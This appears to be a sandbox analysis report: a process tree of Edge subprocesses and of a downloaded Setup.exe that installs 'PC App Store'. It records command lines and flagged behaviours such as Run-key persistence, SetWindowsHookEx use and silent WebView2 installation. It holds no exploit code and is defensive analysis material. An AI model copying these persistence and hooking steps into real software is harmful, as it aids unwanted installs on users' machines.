C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8bf1c46f8,0x7ff8bf1c4708,0x7ff8bf1c47182⤵PID:2860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:22⤵PID:5180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:32⤵PID:1460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:82⤵PID:2136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:12⤵PID:1656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:12⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:82⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:82⤵PID:4940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵PID:5648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:12⤵PID:5488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:3496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:12⤵PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:12⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4264 /prefetch:82⤵PID:5512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵PID:5800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵PID:2896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1124 /prefetch:12⤵PID:928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:12⤵PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5704 /prefetch:82⤵PID:2636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:6008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:12⤵PID:3116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:3992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2248 /prefetch:12⤵PID:2408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:12⤵PID:4188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:5696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2264 /prefetch:12⤵PID:2600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:12⤵PID:5480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:12⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7324 /prefetch:22⤵PID:5648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6824 /prefetch:82⤵PID:3936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:12⤵PID:2172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:12⤵PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7424 /prefetch:12⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:12⤵PID:1952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:82⤵PID:6076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7144 /prefetch:82⤵PID:5200
-
-
C:\Users\Admin\Downloads\Setup.exe"C:\Users\Admin\Downloads\Setup.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://pcapp.store/installing.php?guid=4FC725D8-4F7D-4884-B878-08BB0CE6C800X&winver=19041&version=fa.2001g&nocache=20241204140519.205&_fcid=17333210945494773⤵PID:2364
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8bf1c46f8,0x7ff8bf1c4708,0x7ff8bf1c47184⤵PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsi77EE.tmp"C:\Users\Admin\AppData\Local\Temp\nsi77EE.tmp" /internal 1733321094549477 /force3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2496 -
C:\Users\Admin\PCAppStore\PcAppStore.exe"C:\Users\Admin\PCAppStore\PcAppStore.exe" /init default4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4612 -
C:\Users\Admin\PCAppStore\download\MicrosoftEdgeWebview2Setup.exe"C:\Users\Admin\PCAppStore\download\MicrosoftEdgeWebview2Setup.exe" /silent /install5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5400 -
C:\Program Files (x86)\Microsoft\Temp\EU8E90.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU8E90.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"6⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- System Location Discovery: System Language Discovery
PID:5616 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4136
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4552 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.39\MicrosoftEdgeUpdateComRegisterShell64.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:696
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.39\MicrosoftEdgeUpdateComRegisterShell64.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4912
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.39\MicrosoftEdgeUpdateComRegisterShell64.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4112
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMwODBGMDItQkRCNi00QjVCLTk0RkUtNEJCQjQwREJFRDJGfSIgdXNlcmlkPSJ7QTlDREFDNTMtOENDRS00QzdGLTk3RjgtRDU2NUYwMjA5Q0M2fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntERTY2ODM1MC1CQkJBLTQ2QkEtODlDMi1EQ0I4MjhCMzNGQTV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MzgxNjUyMzQ0IiBpbnN0YWxsX3RpbWVfbXM9IjUzOCIvPjwvYXBwPjwvcmVxdWVzdD47⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2868
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{A3080F02-BDB6-4B5B-94FE-4BBB40DBED2F}" /silent7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3724
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --mojo-named-platform-channel-pipe=4612.4792.181884278214120647485⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- System policy modification
PID:4724 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\PCAppStore\UserData\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\PCAppStore\UserData\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=131.0.2903.70 --initial-client-data=0xf4,0x58,0x144,0x108,0x16c,0x7ff8b8a06070,0x7ff8b8a0607c,0x7ff8b8a060886⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2236
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1840,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=1832 /prefetch:26⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5688
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=2072,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:36⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1788
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=2360,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=2372 /prefetch:86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4868
-
-
